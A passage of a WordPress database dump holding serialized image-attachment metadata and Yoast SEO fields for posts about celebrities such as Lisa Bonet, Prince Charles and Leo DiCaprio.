533x261.jpg\";s:5:\"width\";i:533;s:6:\"height\";i:261;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:10:\"td_534x462\";a:4:{s:4:\"file\";s:24:\"danny-devito-534x462.jpg\";s:5:\"width\";i:534;s:6:\"height\";i:462;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:10:\"td_696x385\";a:4:{s:4:\"file\";s:24:\"danny-devito-600x385.jpg\";s:5:\"width\";i:600;s:6:\"height\";i:385;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:10:\"td_741x486\";a:4:{s:4:\"file\";s:24:\"danny-devito-600x486.jpg\";s:5:\"width\";i:600;s:6:\"height\";i:486;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:11:\"td_1068x580\";a:4:{s:4:\"file\";s:24:\"danny-devito-600x580.jpg\";s:5:\"width\";i:600;s:6:\"height\";i:580;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:8:\"td_0x420\";a:4:{s:4:\"file\";s:24:\"danny-devito-314x420.jpg\";s:5:\"width\";i:314;s:6:\"height\";i:420;s:9:\"mime-type\";s:10:\"image/jpeg\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),(3664,548,'_yoast_wpseo_focuskw_text_input','Danny Devito'),(3665,548,'_yoast_wpseo_content_score','60'),(3666,548,'_thumbnail_id','620'),(3667,548,'_yoast_wpseo_primary_category',''),(3672,622,'_wp_attached_file','2015/11/Lisa-Bonet.jpg'),(3673,622,'_wp_attachment_metadata','a:5:{s:5:\"width\";i:645;s:6:\"height\";i:350;s:4:\"file\";s:22:\"2015/11/Lisa-Bonet.jpg\";s:5:\"sizes\";a:13:{s:9:\"thumbnail\";a:4:{s:4:\"file\";s:22:\"Lisa-Bonet-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:6:\"medium\";a:4:{s:4:\"file\";s:22:\"Lisa-Bonet-300x163.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:163;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:8:\"td_80x60\";a:4:{s:4:\"file\";s:20:\"Lisa-Bonet-80x60.jpg\";s:5:\"width\";i:80;s:6:\"height\";i:60;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:9:\"td_100x70\";a:4:{s:4:\"file\";s:21:\"Lisa-Bonet-100x70.jpg\";s:5:\"width\";i:100;s:6:\"height\";i:70;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:10:\"td_218x150\";a:4:{s:4:\"file\";s:22:\"Lisa-Bonet-218x150.jpg\";s:5:\"width\";i:218;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:10:\"td_265x198\";a:4:{s:4:\"file\";s:22:\"Lisa-Bonet-265x198.jpg\";s:5:\"width\";i:265;s:6:\"height\";i:198;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:10:\"td_324x160\";a:4:{s:4:\"file\";s:22:\"Lisa-Bonet-324x160.jpg\";s:5:\"width\";i:324;s:6:\"height\";i:160;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:10:\"td_324x235\";a:4:{s:4:\"file\";s:22:\"Lisa-Bonet-324x235.jpg\";s:5:\"width\";i:324;s:6:\"height\";i:235;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:10:\"td_324x400\";a:4:{s:4:\"file\";s:22:\"Lisa-Bonet-324x350.jpg\";s:5:\"width\";i:324;s:6:\"height\";i:350;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:10:\"td_356x220\";a:4:{s:4:\"file\";s:22:\"Lisa-Bonet-356x220.jpg\";s:5:\"width\";i:356;s:6:\"height\";i:220;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:10:\"td_356x364\";a:4:{s:4:\"file\";s:22:\"Lisa-Bonet-356x350.jpg\";s:5:\"width\";i:356;s:6:\"height\";i:350;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:10:\"td_533x261\";a:4:{s:4:\"file\";s:22:\"Lisa-Bonet-533x261.jpg\";s:5:\"width\";i:533;s:6:\"height\";i:261;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:10:\"td_534x462\";a:4:{s:4:\"file\";s:22:\"Lisa-Bonet-534x350.jpg\";s:5:\"width\";i:534;s:6:\"height\";i:350;s:9:\"mime-type\";s:10:\"image/jpeg\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),(3674,547,'_yoast_wpseo_focuskw_text_input','Lisa Bonet'),(3675,547,'_yoast_wpseo_content_score','90'),(3676,547,'_thumbnail_id','622'),(3678,547,'_yoast_wpseo_primary_category',''),(3680,624,'_wp_attached_file','2015/11/Lily-Aldridge.jpg'),(3681,624,'_wp_attachment_metadata','a:5:{s:5:\"width\";i:1920;s:6:\"height\";i:1200;s:4:\"file\";s:25:\"2015/11/Lily-Aldridge.jpg\";s:5:\"sizes\";a:21:{s:9:\"thumbnail\";a:4:{s:4:\"file\";s:25:\"Lily-Aldridge-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:6:\"medium\";a:4:{s:4:\"file\";s:25:\"Lily-Aldridge-300x188.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:188;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:12:\"medium_large\";a:4:{s:4:\"file\";s:25:\"Lily-Aldridge-768x480.jpg\";s:5:\"width\";i:768;s:6:\"height\";i:480;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:5:\"large\";a:4:{s:4:\"file\";s:26:\"Lily-Aldridge-1024x640.jpg\";s:5:\"width\";i:1024;s:6:\"height\";i:640;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:8:\"td_80x60\";a:4:{s:4:\"file\";s:23:\"Lily-Aldridge-80x60.jpg\";s:5:\"width\";i:80;s:6:\"height\";i:60;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:9:\"td_100x70\";a:4:{s:4:\"file\";s:24:\"Lily-Aldridge-100x70.jpg\";s:5:\"width\";i:100;s:6:\"height\";i:70;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:10:\"td_218x150\";a:4:{s:4:\"file\";s:25:\"Lily-Aldridge-218x150.jpg\";s:5:\"width\";i:218;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:10:\"td_265x198\";a:4:{s:4:\"file\";s:25:\"Lily-Aldridge-265x198.jpg\";s:5:\"width\";i:265;s:6:\"height\";i:198;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:10:\"td_324x160\";a:4:{s:4:\"file\";s:25:\"Lily-Aldridge-324x160.jpg\";s:5:\"width\";i:324;s:6:\"height\";i:160;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:10:\"td_324x235\";a:4:{s:4:\"file\";s:25:\"Lily-Aldridge-324x235.jpg\";s:5:\"width\";i:324;s:6:\"height\";i:235;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:10:\"td_324x400\";a:4:{s:4:\"file\";s:25:\"Lily-Aldridge-324x400.jpg\";s:5:\"width\";i:324;s:6:\"height\";i:400;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:10:\"td_356x220\";a:4:{s:4:\"file\";s:25:\"Lily-Aldridge-356x220.jpg\";s:5:\"width\";i:356;s:6:\"height\";i:220;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:10:\"td_356x364\";a:4:{s:4:\"file\";s:25:\"Lily-Aldridge-356x364.jpg\";s:5:\"width\";i:356;s:6:\"height\";i:364;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:10:\"td_533x261\";a:4:{s:4:\"file\";s:25:\"Lily-Aldridge-533x261.jpg\";s:5:\"width\";i:533;s:6:\"height\";i:261;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:10:\"td_534x462\";a:4:{s:4:\"file\";s:25:\"Lily-Aldridge-534x462.jpg\";s:5:\"width\";i:534;s:6:\"height\";i:462;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:8:\"td_696x0\";a:4:{s:4:\"file\";s:25:\"Lily-Aldridge-696x435.jpg\";s:5:\"width\";i:696;s:6:\"height\";i:435;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:10:\"td_696x385\";a:4:{s:4:\"file\";s:25:\"Lily-Aldridge-696x385.jpg\";s:5:\"width\";i:696;s:6:\"height\";i:385;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:10:\"td_741x486\";a:4:{s:4:\"file\";s:25:\"Lily-Aldridge-741x486.jpg\";s:5:\"width\";i:741;s:6:\"height\";i:486;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:11:\"td_1068x580\";a:4:{s:4:\"file\";s:26:\"Lily-Aldridge-1068x580.jpg\";s:5:\"width\";i:1068;s:6:\"height\";i:580;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:9:\"td_1068x0\";a:4:{s:4:\"file\";s:26:\"Lily-Aldridge-1068x668.jpg\";s:5:\"width\";i:1068;s:6:\"height\";i:668;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:8:\"td_0x420\";a:4:{s:4:\"file\";s:25:\"Lily-Aldridge-672x420.jpg\";s:5:\"width\";i:672;s:6:\"height\";i:420;s:9:\"mime-type\";s:10:\"image/jpeg\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),(3682,546,'_thumbnail_id','624'),(3683,546,'_yoast_wpseo_primary_category',''),(3684,546,'_yoast_wpseo_focuskw_text_input','Lily Aldridge'),(3685,546,'_yoast_wpseo_content_score','90'),(3688,627,'_wp_attached_file','2015/11/prince-charles.jpg'),(3689,627,'_wp_attachment_metadata','a:5:{s:5:\"width\";i:615;s:6:\"height\";i:700;s:4:\"file\";s:26:\"2015/11/prince-charles.jpg\";s:5:\"sizes\";a:17:{s:9:\"thumbnail\";a:4:{s:4:\"file\";s:26:\"prince-charles-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:6:\"medium\";a:4:{s:4:\"file\";s:26:\"prince-charles-264x300.jpg\";s:5:\"width\";i:264;s:6:\"height\";i:300;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:8:\"td_80x60\";a:4:{s:4:\"file\";s:24:\"prince-charles-80x60.jpg\";s:5:\"width\";i:80;s:6:\"height\";i:60;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:9:\"td_100x70\";a:4:{s:4:\"file\";s:25:\"prince-charles-100x70.jpg\";s:5:\"width\";i:100;s:6:\"height\";i:70;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:10:\"td_218x150\";a:4:{s:4:\"file\";s:26:\"prince-charles-218x150.jpg\";s:5:\"width\";i:218;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:10:\"td_265x198\";a:4:{s:4:\"file\";s:26:\"prince-charles-265x198.jpg\";s:5:\"width\";i:265;s:6:\"height\";i:198;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:10:\"td_324x160\";a:4:{s:4:\"file\";s:26:\"prince-charles-324x160.jpg\";s:5:\"width\";i:324;s:6:\"height\";i:160;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:10:\"td_324x235\";a:4:{s:4:\"file\";s:26:\"prince-charles-324x235.jpg\";s:5:\"width\";i:324;s:6:\"height\";i:235;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:10:\"td_324x400\";a:4:{s:4:\"file\";s:26:\"prince-charles-324x400.jpg\";s:5:\"width\";i:324;s:6:\"height\";i:400;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:10:\"td_356x220\";a:4:{s:4:\"file\";s:26:\"prince-charles-356x220.jpg\";s:5:\"width\";i:356;s:6:\"height\";i:220;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:10:\"td_356x364\";a:4:{s:4:\"file\";s:26:\"prince-charles-356x364.jpg\";s:5:\"width\";i:356;s:6:\"height\";i:364;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:10:\"td_533x261\";a:4:{s:4:\"file\";s:26:\"prince-charles-533x261.jpg\";s:5:\"width\";i:533;s:6:\"height\";i:261;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:10:\"td_534x462\";a:4:{s:4:\"file\";s:26:\"prince-charles-534x462.jpg\";s:5:\"width\";i:534;s:6:\"height\";i:462;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:10:\"td_696x385\";a:4:{s:4:\"file\";s:26:\"prince-charles-615x385.jpg\";s:5:\"width\";i:615;s:6:\"height\";i:385;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:10:\"td_741x486\";a:4:{s:4:\"file\";s:26:\"prince-charles-615x486.jpg\";s:5:\"width\";i:615;s:6:\"height\";i:486;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:11:\"td_1068x580\";a:4:{s:4:\"file\";s:26:\"prince-charles-615x580.jpg\";s:5:\"width\";i:615;s:6:\"height\";i:580;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:8:\"td_0x420\";a:4:{s:4:\"file\";s:26:\"prince-charles-369x420.jpg\";s:5:\"width\";i:369;s:6:\"height\";i:420;s:9:\"mime-type\";s:10:\"image/jpeg\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),(3690,545,'_yoast_wpseo_focuskw_text_input','Prince Charles'),(3691,545,'_yoast_wpseo_content_score','90'),(3692,545,'_thumbnail_id','627'),(3694,545,'_yoast_wpseo_primary_category',''),(3695,629,'_wp_attached_file','2015/11/whoopi-goldberg.jpg'),(3696,629,'_wp_attachment_metadata','a:5:{s:5:\"width\";i:670;s:6:\"height\";i:875;s:4:\"file\";s:27:\"2015/11/whoopi-goldberg.jpg\";s:5:\"sizes\";a:17:{s:9:\"thumbnail\";a:4:{s:4:\"file\";s:27:\"whoopi-goldberg-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:6:\"medium\";a:4:{s:4:\"file\";s:27:\"whoopi-goldberg-230x300.jpg\";s:5:\"width\";i:230;s:6:\"height\";i:300;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:8:\"td_80x60\";a:4:{s:4:\"file\";s:25:\"whoopi-goldberg-80x60.jpg\";s:5:\"width\";i:80;s:6:\"height\";i:60;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:9:\"td_100x70\";a:4:{s:4:\"file\";s:26:\"whoopi-goldberg-100x70.jpg\";s:5:\"width\";i:100;s:6:\"height\";i:70;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:10:\"td_218x150\";a:4:{s:4:\"file\";s:27:\"whoopi-goldberg-218x150.jpg\";s:5:\"width\";i:218;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:10:\"td_265x198\";a:4:{s:4:\"file\";s:27:\"whoopi-goldberg-265x198.jpg\";s:5:\"width\";i:265;s:6:\"height\";i:198;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:10:\"td_324x160\";a:4:{s:4:\"file\";s:27:\"whoopi-goldberg-324x160.jpg\";s:5:\"width\";i:324;s:6:\"height\";i:160;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:10:\"td_324x235\";a:4:{s:4:\"file\";s:27:\"whoopi-goldberg-324x235.jpg\";s:5:\"width\";i:324;s:6:\"height\";i:235;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:10:\"td_324x400\";a:4:{s:4:\"file\";s:27:\"whoopi-goldberg-324x400.jpg\";s:5:\"width\";i:324;s:6:\"height\";i:400;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:10:\"td_356x220\";a:4:{s:4:\"file\";s:27:\"whoopi-goldberg-356x220.jpg\";s:5:\"width\";i:356;s:6:\"height\";i:220;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:10:\"td_356x364\";a:4:{s:4:\"file\";s:27:\"whoopi-goldberg-356x364.jpg\";s:5:\"width\";i:356;s:6:\"height\";i:364;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:10:\"td_533x261\";a:4:{s:4:\"file\";s:27:\"whoopi-goldberg-533x261.jpg\";s:5:\"width\";i:533;s:6:\"height\";i:261;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:10:\"td_534x462\";a:4:{s:4:\"file\";s:27:\"whoopi-goldberg-534x462.jpg\";s:5:\"width\";i:534;s:6:\"height\";i:462;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:10:\"td_696x385\";a:4:{s:4:\"file\";s:27:\"whoopi-goldberg-670x385.jpg\";s:5:\"width\";i:670;s:6:\"height\";i:385;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:10:\"td_741x486\";a:4:{s:4:\"file\";s:27:\"whoopi-goldberg-670x486.jpg\";s:5:\"width\";i:670;s:6:\"height\";i:486;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:11:\"td_1068x580\";a:4:{s:4:\"file\";s:27:\"whoopi-goldberg-670x580.jpg\";s:5:\"width\";i:670;s:6:\"height\";i:580;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:8:\"td_0x420\";a:4:{s:4:\"file\";s:27:\"whoopi-goldberg-322x420.jpg\";s:5:\"width\";i:322;s:6:\"height\";i:420;s:9:\"mime-type\";s:10:\"image/jpeg\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),(3697,540,'_yoast_wpseo_focuskw_text_input','Whoopi Goldberg'),(3698,540,'_yoast_wpseo_content_score','30'),(3699,540,'_thumbnail_id','629'),(3701,540,'_yoast_wpseo_primary_category',''),(3702,631,'_wp_attached_file','2015/11/ryan-gosling.jpg'),(3703,631,'_wp_attachment_metadata','a:5:{s:5:\"width\";i:560;s:6:\"height\";i:485;s:4:\"file\";s:24:\"2015/11/ryan-gosling.jpg\";s:5:\"sizes\";a:15:{s:9:\"thumbnail\";a:4:{s:4:\"file\";s:24:\"ryan-gosling-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:6:\"medium\";a:4:{s:4:\"file\";s:24:\"ryan-gosling-300x260.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:260;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:8:\"td_80x60\";a:4:{s:4:\"file\";s:22:\"ryan-gosling-80x60.jpg\";s:5:\"width\";i:80;s:6:\"height\";i:60;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:9:\"td_100x70\";a:4:{s:4:\"file\";s:23:\"ryan-gosling-100x70.jpg\";s:5:\"width\";i:100;s:6:\"height\";i:70;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:10:\"td_218x150\";a:4:{s:4:\"file\";s:24:\"ryan-gosling-218x150.jpg\";s:5:\"width\";i:218;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:10:\"td_265x198\";a:4:{s:4:\"file\";s:24:\"ryan-gosling-265x198.jpg\";s:5:\"width\";i:265;s:6:\"height\";i:198;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:10:\"td_324x160\";a:4:{s:4:\"file\";s:24:\"ryan-gosling-324x160.jpg\";s:5:\"width\";i:324;s:6:\"height\";i:160;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:10:\"td_324x235\";a:4:{s:4:\"file\";s:24:\"ryan-gosling-324x235.jpg\";s:5:\"width\";i:324;s:6:\"height\";i:235;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:10:\"td_324x400\";a:4:{s:4:\"file\";s:24:\"ryan-gosling-324x400.jpg\";s:5:\"width\";i:324;s:6:\"height\";i:400;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:10:\"td_356x220\";a:4:{s:4:\"file\";s:24:\"ryan-gosling-356x220.jpg\";s:5:\"width\";i:356;s:6:\"height\";i:220;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:10:\"td_356x364\";a:4:{s:4:\"file\";s:24:\"ryan-gosling-356x364.jpg\";s:5:\"width\";i:356;s:6:\"height\";i:364;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:10:\"td_533x261\";a:4:{s:4:\"file\";s:24:\"ryan-gosling-533x261.jpg\";s:5:\"width\";i:533;s:6:\"height\";i:261;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:10:\"td_534x462\";a:4:{s:4:\"file\";s:24:\"ryan-gosling-534x462.jpg\";s:5:\"width\";i:534;s:6:\"height\";i:462;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:10:\"td_696x385\";a:4:{s:4:\"file\";s:24:\"ryan-gosling-560x385.jpg\";s:5:\"width\";i:560;s:6:\"height\";i:385;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:8:\"td_0x420\";a:4:{s:4:\"file\";s:24:\"ryan-gosling-485x420.jpg\";s:5:\"width\";i:485;s:6:\"height\";i:420;s:9:\"mime-type\";s:10:\"image/jpeg\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),(3704,535,'_yoast_wpseo_focuskw_text_input','Ryan Gosling'),(3705,535,'_yoast_wpseo_content_score','90'),(3706,633,'_wp_attached_file','2015/11/leo-dicaprio.jpg'),(3707,633,'_wp_attachment_metadata','a:5:{s:5:\"width\";i:634;s:6:\"height\";i:983;s:4:\"file\";s:24:\"2015/11/leo-dicaprio.jpg\";s:5:\"sizes\";a:17:{s:9:\"thumbnail\";a:4:{s:4:\"file\";s:24:\"leo-dicaprio-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:6:\"medium\";a:4:{s:4:\"file\";s:24:\"leo-dicaprio-193x300.jpg\";s:5:\"width\";i:193;s:6:\"height\";i:300;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:8:\"td_80x60\";a:4:{s:4:\"file\";s:22:\"leo-dicaprio-80x60.jpg\";s:5:\"width\";i:80;s:6:\"height\";i:60;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:9:\"td_100x70\";a:4:{s:4:\"file\";s:23:\"leo-dicaprio-100x70.jpg\";s:5:\"width\";i:100;s:6:\"height\";i:70;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:10:\"td_218x150\";a:4:{s:4:\"file\";s:24:\"leo-dicaprio-218x150.jpg\";s:5:\"width\";i:218;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:10:\"td_265x198\";a:4:{s:4:\"file\";s:24:\"leo-dicaprio-265x198.jpg\";s:5:\"width\";i:265;s:6:\"height\";i:198;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:10:\"td_324x160\";a:4:{s:4:\"file\";s:24:\"leo-dicaprio-324x160.jpg\";s:5:\"width\";i:324;s:6:\"height\";i:160;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:10:\"td_324x235\";a:4:{s:4:\"file\";s:24:\"leo-dicaprio-324x235.jpg\";s:5:\"width\";i:324;s:6:\"height\";i:235;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:10:\"td_324x400\";a:4:{s:4:\"file\";s:24:\"leo-dicaprio-324x400.jpg\";s:5:\"width\";i:324;s:6:\"height\";i:400;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:10:\"td_356x220\";a:4:{s:4:\"file\";s:24:\"leo-dicaprio-356x220.jpg\";s:5:\"width\";i:356;s:6:\"height\";i:220;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:10:\"td_356x364\";a:4:{s:4:\"file\";s:24:\"leo-dicaprio-356x364.jpg\";s:5:\"width\";i:356;s:6:\"height\";i:364;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:10:\"td_533x261\";a:4:{s:4:\"file\";s:24:\"leo-dicaprio-533x261.jpg\";s:5:\"width\";i:533;s:6:\"height\";i:261;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:10:\"td_534x462\";a:4:{s:4:\"file\";s:24:\"leo-dicaprio-534x462.jpg\";s:5:\"width\";i:534;s:6:\"height\";i:462;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:10:\"td_696x385\";a:4:{s:4:\"file\";s:24:\"leo-dicaprio-634x385.jpg\";s:5:\"width\";i:634;s:6:\"height\";i:385;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:10:\"td_741x486\";a:4:{s:4:\"file\";s:24:\"leo-dicaprio-634x486.jpg\";s:5:\"width\";i:634;s:6:\"height\";i:486;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:11:\"td_1068x580\";a:4:{s:4:\"file\";s:24:\"leo-dicaprio-634x580.jpg\";s:5:\"width\";i:634;s:6:\"height\";i:580;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:8:\"td_0x420\";a:4:{s:4:\"file\";s:24:\"leo-dicaprio-271x420.jpg\";s:5:\"width\";i:271;s:6:\"height\";i:420;s:9:\"mime-type\";s:10:\"image/jpeg\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:29:\"© Justin Goff/GoffPhotos.com\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),(3708,534,'_yoast_wpseo_focuskw_text_input','Leo DiCaprio'),(3709,534,'_yoast_wpseo_content_score','60'),(3710,635,'_wp_attached_file','2015/11/leo-dicaprio2.jpg'),(3711,635,'_wp_attachment_metadata','a:5:{s:5:\"width\";i:654;s:6:\"height\";i:900;s:4:\"file\";s:25:\"2015/11/leo-dicaprio2.jpg\";s:5:\"sizes\";a:17:{s:9:\"thumbnail\";a:4:{s:4:\"file\";s:25:\"leo-dicaprio2-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:6:\"medium\";a:4:{s:4:\"file\";s:25:\"leo-dicaprio2-218x300.jpg\";s:5:\"width\";i:218;s:6:\"height\";i:300;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:8:\"td_80x60\";a:4:{s:4:\"file\";s:23:\"leo-dicaprio2-80x60.jpg\";s:5:\"width\";i:80;s:6:\"height\";i:60;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:9:\"td_100x70\";a:4:{s:4:\"file\";s:24:\"leo-dicaprio2-100x70.jpg\";s:5:\"width\";i:100;s:6:\"height\";i:70;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:10:\"td_218x150\";a:4:{s:4:\"file\";s:25:\"leo-dicaprio2-218x150.jpg\";s:5:\"width\";i:218;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:10:\"td_265x198\";a:4:{s:4:\"file\";s:25:\"leo-dicaprio2-265x198.jpg\";s:5:\"width\";i:265;s:6:\"height\";i:198;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:10:\"td_324x160\";a:4:{s:4:\"file\";s:25:\"leo-dicaprio2-324x160.jp